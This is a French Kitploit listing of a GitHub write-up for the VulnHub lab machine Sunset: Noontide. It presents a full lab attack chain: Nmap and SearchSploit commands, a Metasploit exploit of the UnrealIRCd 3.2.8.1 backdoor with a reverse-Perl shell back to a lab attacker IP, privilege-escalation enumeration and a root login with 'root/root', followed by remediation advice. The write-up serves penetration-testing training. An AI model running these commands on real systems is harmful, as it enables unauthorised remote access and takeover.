Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sunset-noontide-pentesting — Description Évaluation professionnelle de test d'intrusion de la machine VulnHub Sunset: Noontide, couvrant la reconnaissance, l'énumération des services, l'exploitation de CVE-2010-2075, la post-exploitation, l'élévation de privilèges et la compromission complète du système. | Kitploit
Outils/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalade de PrivilègesReconnaissanceScan de PortsAnalyse des VulnérabilitésExploitationPost-ExploitationSécurité RéseauCTFTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Apprentissage et Éducation
Red Teaming
Labs et Pratique
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Description Évaluation professionnelle de test d'intrusion de la machine VulnHub Sunset: Noontide, couvrant la reconnaissance, l'énumération des services, l'exploitation de CVE-2010-2075, la post-exploitation, l'élévation de privilèges et la compromission complète du système.

Voir le dépôt
il y a 9h 7mPas encore vérifié

Sunset: Noontide — Test d'intrusion

Une évaluation professionnelle de test d'intrusion et un walkthrough CTF de Sunset: Noontide, une machine intentionnellement vulnérable de VulnHub.

Ce projet documente le cycle complet de test d'intrusion, incluant la reconnaissance, l'énumération des services, la recherche de vulnérabilités, l'exploitation, l'accès initial, la post-exploitation, l'élévation de privilèges, la preuve de compromission, l'évaluation des risques, le mapping MITRE ATT&CK et la remédiation.

⚠️ Avertissement : Cette évaluation a été réalisée contre une machine intentionnellement vulnérable dans un environnement de laboratoire autorisé. Les techniques et commandes documentées ici sont destinées uniquement aux systèmes pour lesquels une autorisation explicite a été obtenue.


🎯 Objectifs

  • Identifier l'hôte cible
  • Énumérer les services exposés
  • Identifier les logiciels et versions vulnérables
  • Rechercher les vulnérabilités applicables
  • Exploiter le service vulnérable
  • Obtenir un accès shell initial
  • Effectuer l'énumération de post-exploitation Linux
  • Identifier les opportunités d'élévation de privilèges
  • Obtenir un accès root
  • Récupérer les fichiers de preuve user et root
  • Documenter les conclusions de sécurité
  • Fournir des recommandations de remédiation

🖥️ Environnement de laboratoire

ComposantDétails
CibleSunset: Noontide
PlateformeVulnHub
IP cible10.106.186.186
Nom d'hôte ciblenoontide
OS cibleDebian GNU/Linux 10 (Buster)
Architecturex86_64
Plateforme attaquanteKali Linux
IP attaquante10.106.186.204
Type d'évaluationÉvaluation en laboratoire autorisée
Risque globalCRITIQUE
Résultat de l'évaluationCompromission totale du système

🔐 Chaîne d'attaque

Découverte de la cible → Énumération Nmap → UnrealIRCd 3.2.8.1 identifié → SearchSploit → CVE-2010-2075 identifié → Exploitation Metasploit → Shell de commande distant → Shell en tant que server → Post-exploitation Linux → Identifiant root faible → su root → UID 0 / Accès root → Fichiers de preuve user et root


1. Reconnaissance

Une découverte réseau initiale a été effectuée pour identifier la cible vulnérable.

La cible a finalement été identifiée comme :

10.106.186.186

Lors de la reconnaissance, 10.106.186.142 a été identifié comme la passerelle par défaut plutôt que la cible visée.

Cela souligne l'importance d'identifier correctement la cible avant d'effectuer d'autres tests de sécurité, en particulier dans un réseau de laboratoire en mode bridge ou partagé.


2. Énumération des services

La détection de service et de version Nmap a été effectuée contre la cible à l'aide de :

nmap -sV 10.106.186.186

Le service exposé significatif identifié lors de l'évaluation était :

6667/tcp open irc UnrealIRCd

Un scan plus détaillé a ensuite été effectué à l'aide de :

nmap -sC -sV -Pn -p 6667 10.106.186.186

Le service a été identifié comme :

UnrealIRCd 3.2.8.1

Le service IRC a également signalé :

irc.foonet.com

Le service UnrealIRCd exposé est devenu la principale surface d'attaque étudiée lors de l'évaluation.


3. Recherche de vulnérabilités

SearchSploit a été utilisé pour étudier les vulnérabilités documentées publiquement associées à la version d'UnrealIRCd découverte.

Commande :

searchsploit UnrealIRCd 3.2.8.1

Le résultat pertinent était :

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

La vulnérabilité a été identifiée comme :

CVE-2010-2075

Vulnérabilité

Exécution de commandes via backdoor dans UnrealIRCd 3.2.8.1

Sévérité

Critique

Type d'attaque

Exécution de commandes à distance

Impact de sécurité

L'exploitation réussie du service vulnérable permet à un attaquant d'exécuter des commandes à distance sur le système cible.


4. Exploitation Metasploit

Le service IRC vulnérable a été exploité à l'aide du Metasploit Framework.

Le module sélectionné était :

exploit/unix/irc/unreal_ircd_3281_backdoor

Exemple de configuration :

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

Les tentatives initiales de payload n'ont pas produit de session utilisable.

Un payload Unix reverse-Perl compatible a ensuite été sélectionné :

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit a signalé que la cible semblait vulnérable et a ouvert avec succès une session de shell de commande.


5. Accès initial

Le shell obtenu a été vérifié à l'aide de :

whoami

Résultat :

server

Cela a confirmé l'exécution réussie de commandes à distance en tant que compte server.

Le répertoire de travail initial était :

/home/server/irc/Unreal3.2

À ce stade, l'évaluation est passée de l'exploitation d'un service distant à l'énumération de post-exploitation locale.


6. Énumération de post-exploitation

Après l'obtention du shell, une énumération Linux standard a été effectuée pour comprendre l'hôte compromis et identifier les chemins potentiels d'élévation de privilèges.

Utilisateur actuel

Commande :

id

Résultat :

uid=1000(server) gid=1000(server)

Le compte était un utilisateur non-root.

Nom d'hôte

Commande :

hostname

Résultat :

noontide

Informations sur le noyau

Commande :

uname -a

Résultat :

Linux noontide 4.19.0-10-amd64 x86_64

Système d'exploitation

Commande :

cat /etc/os-release

Résultat :

Debian GNU/Linux 10 (buster)

Ces commandes ont établi l'identité actuelle, le nom d'hôte, la version du noyau, le système d'exploitation et la configuration générale du système.


7. Énumération pour l'élévation de privilèges

Plusieurs vérifications standard d'élévation de privilèges Linux ont été effectuées.

7.1 Énumération SUID

Commande :

find / -perm -4000 -type f 2>/dev/null

Des binaires SUID standard tels que passwd, chsh, mount, umount, su, chfn, newgrp et gpasswd ont été identifiés.

Aucun binaire SUID personnalisé ou anormal évident n'a été identifié comme le vecteur d'élévation réussi.


7.2 Énumération Sudo

Commande :

sudo -l

Aucun chemin utile d'élévation de privilèges basé sur sudo n'a été identifié à partir de la sortie disponible.


7.3 Énumération Cron

Commandes :

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

Les tâches planifiées observées étaient des tâches système standard de type Debian.

Aucune tâche cron root inscriptible évidente n'a été identifiée.


7.4 Énumération des fichiers inscriptibles

Commande :

find / -writable -type f 2>/dev/null | head -100

Les résultats initiaux étaient principalement des pseudo-fichiers /proc et n'ont pas révélé de vecteur pratique d'élévation de privilèges.


7.5 Capacités Linux

Commande :

getcap -r / 2>/dev/null

Aucune élévation de privilèges utile basée sur les capacités n'a été identifiée à partir de la sortie résultante.


8. Élévation de privilèges

Le chemin d'élévation de privilèges réussi était basé sur les identifiants root intentionnellement faibles configurés sur la machine vulnérable.

Le compte root a été accédé à l'aide de :

su root

Mot de passe :

root

L'accès root a ensuite été vérifié à l'aide de :

id

Résultat :

uid=0(root) gid=0(root) groups=0(root)

L'identité a également été confirmée à l'aide de :

whoami

Résultat :

root

Cela a confirmé le contrôle administratif complet du système cible.


9. Preuve de compromission

9.1 Preuve au niveau utilisateur

Le fichier de preuve au niveau utilisateur était situé à :

/home/server/local.txt

Commande :

cat /home/server/local.txt

Résultat :

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Preuve au niveau root

Le fichier de preuve au niveau root était situé à :

/root/proof.txt

Commande :

cat /root/proof.txt

Résultat :

ab28c8ca8da1b9ffc2d702ac54221105

La preuve root a également renvoyé :

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

La récupération des deux fichiers de preuve confirme la compromission réussie depuis l'accès distant initial jusqu'au contrôle root.


10. Résumé des risques

IDConstatSévéritéImpact
VULN-01Backdoor UnrealIRCd 3.2.8.1🔴 CritiqueExécution de commandes à distance
VULN-02Identifiants root faibles🔴 CritiqueCompromission administrative complète

11. Constats détaillés

VULN-01 — Backdoor UnrealIRCd 3.2.8.1

Sévérité : Critique

Service affecté : IRC / TCP 6667

Logiciel affecté : UnrealIRCd 3.2.8.1

CVE : CVE-2010-2075

Type d'attaque : Exécution de commandes à distance

Impact observé : Shell distant obtenu en tant que server

Description

Le service UnrealIRCd exposé exécutait une version vulnérable associée à une vulnérabilité connue d'exécution de commandes via backdoor.

La vulnérabilité a été identifiée par l'énumération des services et la recherche SearchSploit, et a été exploitée avec succès à l'aide de Metasploit.

Impact métier

Un attaquant capable d'atteindre le service IRC vulnérable pourrait exécuter des commandes à distance et obtenir un accès non autorisé à l'hôte.


VULN-02 — Identifiants root faibles

Sévérité : Critique

Compte affecté : root

Identifiant observé : root / root

Impact observé : Accès administratif UID 0

Description

Le compte root était configuré avec un identifiant extrêmement faible.

Après avoir obtenu un shell local en tant que server, le compte root a été accédé à l'aide de l'identifiant faible et vérifié avec l'UID 0.

Impact métier

Un attaquant qui obtient un accès shell local peut utiliser l'identifiant root faible pour obtenir le contrôle complet du système d'exploitation.


12. Mapping MITRE ATT&CK


13. Recommandations de remédiation

13.1 Supprimer ou mettre à niveau UnrealIRCd

Remplacez l'installation vulnérable d'UnrealIRCd par une version fiable et prise en charge.

Vérifiez l'intégrité du logiciel et la provenance des paquets avant le déploiement.

13.2 Supprimer les logiciels backdoorés

Si l'intégrité ou la provenance du logiciel est incertaine, reconstruisez le système à l'aide de supports d'installation fiables et de paquets vérifiés.

13.3 Éliminer les identifiants faibles

Remplacez les identifiants par défaut et faibles par des identifiants administratifs forts et uniques.

N'utilisez pas de mots de passe simples tels que root.

13.4 Restreindre l'exposition IRC

Si IRC est requis, restreignez l'accès à l'aide de :

  • Règles de pare-feu
  • Segmentation réseau
  • Accès VPN
  • Restrictions par IP source

13.5 Appliquer les mises à jour de sécurité

Maintenez un processus documenté de gestion des correctifs pour le système d'exploitation et tous les services exposés.

13.6 Surveiller les accès privilégiés

Journalisez et examinez :

  • L'authentification administrative
  • L'accès root
  • Les changements de privilèges
  • Les activités d'authentification suspectes

14. Méthodologie de test d'intrusion


15. Outils utilisés

  • Nmap — Découverte réseau et énumération des services
  • SearchSploit — Recherche de vulnérabilités et d'exploits
  • Metasploit Framework — Exploitation et établissement de session
  • Utilitaires en ligne de commande Linux — Post-exploitation et énumération des privilèges

16. Compétences démontrées

  • Reconnaissance réseau
  • Découverte d'hôtes
  • Scan de ports
  • Énumération des services
  • Identification de versions
  • Évaluation des vulnérabilités
  • Recherche de CVE
  • SearchSploit
  • Metasploit Framework
  • Exécution de commandes à distance
  • Énumération Linux
  • Énumération SUID
  • Énumération Sudo
  • Énumération Cron
  • Énumération des fichiers inscriptibles
  • Capacités Linux
  • Évaluation de la sécurité des identifiants
  • Élévation de privilèges
  • Preuve de compromission
  • Mapping MITRE ATT&CK
  • Évaluation des risques
  • Rapport de sécurité
  • Analyse de remédiation

17. Évaluation finale

L'hôte Sunset: Noontide a été compromis avec succès depuis l'accès réseau initial jusqu'au contrôle root complet.

La principale vulnérabilité d'accès initial était la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075).

La vulnérabilité a permis l'exécution de commandes à distance et a abouti à un shell initial en tant que compte server.

L'énumération de post-exploitation a ensuite été effectuée, incluant les vérifications SUID, sudo, cron, fichiers inscriptibles, capacités Linux, identité, système d'exploitation et système de fichiers.

Ces vérifications n'ont pas identifié la route d'élévation réussie.

L'accès administratif complet a finalement été obtenu grâce aux identifiants root faibles de la machine.

La récupération réussie des deux fichiers de preuve au niveau utilisateur et au niveau root a confirmé la compromission totale du système.

Évaluation globale

CRITIQUE — Compromission totale du système atteinte


18. Résultats de l'évaluation


19. Rapport professionnel de test d'intrusion

Un rapport professionnel détaillé de test d'intrusion est inclus avec ce projet :

Sunset-Noontide-Penetration-Testing-Report.pdf

Le rapport contient :

  • Résumé exécutif
  • Contrôle du document
  • Périmètre et règles d'engagement
  • Résumé des risques
  • Chemin d'attaque
  • Reconnaissance
  • Énumération des services
  • Recherche de vulnérabilités
  • Exploitation Metasploit
  • Accès initial
  • Post-exploitation
  • Élévation de privilèges
  • Preuves et fichiers de preuve
  • Constats détaillés
  • Mapping MITRE ATT&CK
  • Recommandations de remédiation
  • Évaluation finale

20. Preuves

Structure de dépôt suggérée :

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

Les captures d'écran ne doivent contenir que des informations provenant de l'environnement de laboratoire autorisé.


21. Leçons apprises

Cette évaluation a fourni une expérience pratique dans :

  1. L'identification correcte de la cible visée dans un environnement réseau.
  2. La réalisation de l'énumération des services et des versions avec Nmap.
  3. La recherche de vulnérabilités à l'aide de SearchSploit.
  4. La sélection d'un module d'exploit Metasploit approprié.
  5. Le dépannage de la compatibilité des payloads.
  6. L'établissement d'un shell de commande distant.
  7. La réalisation de l'énumération de post-exploitation Linux.
  8. La vérification systématique des vecteurs courants d'élévation de privilèges.
  9. L'identification d'identifiants administratifs faibles.
  10. La vérification de la compromission au niveau root.
  11. La collecte de preuves de compromission.
  12. La documentation des vulnérabilités dans un format professionnel de test d'intrusion.

22. ⚠️ Avertissement légal et éthique

Ce dépôt est destiné strictement à :

  • L'éducation en cybersécurité
  • Les tests d'intrusion autorisés
  • La pratique de CTF
  • La recherche de vulnérabilités
  • Les environnements de laboratoire

Les techniques documentées dans ce dépôt ne doivent être effectuées que contre des systèmes pour lesquels une autorisation explicite a été obtenue.

N'utilisez pas ces techniques contre des systèmes de production, des infrastructures publiques ou des systèmes tiers sans autorisation.


👨‍💻 Auteur

Alen Sales K S

Cybersécurité | Test d'intrusion | SOC | Sécurité réseau

GitHub : https://github.com/zales2004


⭐ Résumé du projet

Sunset: Noontide démontre un workflow complet de test d'intrusion :

Reconnaissance → Énumération → Recherche de vulnérabilités → Exploitation → Accès initial → Post-exploitation → Élévation de privilèges → Accès root → Collecte de preuves → Évaluation des risques → Rapport de sécurité

Résultat de l'évaluation : CRITIQUE — Compromission totale du système atteinte

Télécharger l’outil
TechniqueIDActivité observée
Network Service ScanningT1046Énumération Nmap
Exploit Public-Facing ApplicationT1190Exploitation du service UnrealIRCd exposé
Command and Scripting InterpreterT1059Shell de commande distant
Valid AccountsT1078Utilisation des identifiants root
Account DiscoveryT1087Énumération d'identité et d'utilisateurs
System Information DiscoveryT1082uname et /etc/os-release
File and Directory DiscoveryT1083Énumération du système de fichiers
Scheduled Task/Job DiscoveryT1053Énumération Cron
Permission Groups DiscoveryT1069id et énumération des groupes
PhaseActivités
ReconnaissanceDécouverte réseau et identification de la cible
ÉnumérationDétection de service/version Nmap
Recherche de vulnérabilitésIdentification des modules SearchSploit et Metasploit
ExploitationExploitation de la backdoor UnrealIRCd
Accès initialShell de commande en tant que server
Post-exploitationÉnumération d'identité, d'OS, de système de fichiers et de privilèges
Élévation de privilègesVérifications SUID, sudo, cron, fichiers inscriptibles et capacités
Collecte de preuvesFichiers de preuve user et root
RapportConstats, analyse des risques et remédiation
ObjectifStatut
Cible identifiée✅ PASS
Service exposé identifié✅ PASS
Version vulnérable identifiée✅ PASS
CVE identifiée✅ PASS
Exécution de commandes à distance✅ PASS
Shell initial en tant que server✅ PASS
Preuve utilisateur récupérée✅ PASS
Élévation de privilèges✅ PASS
Accès root vérifié✅ PASS
Preuve root récupérée✅ PASS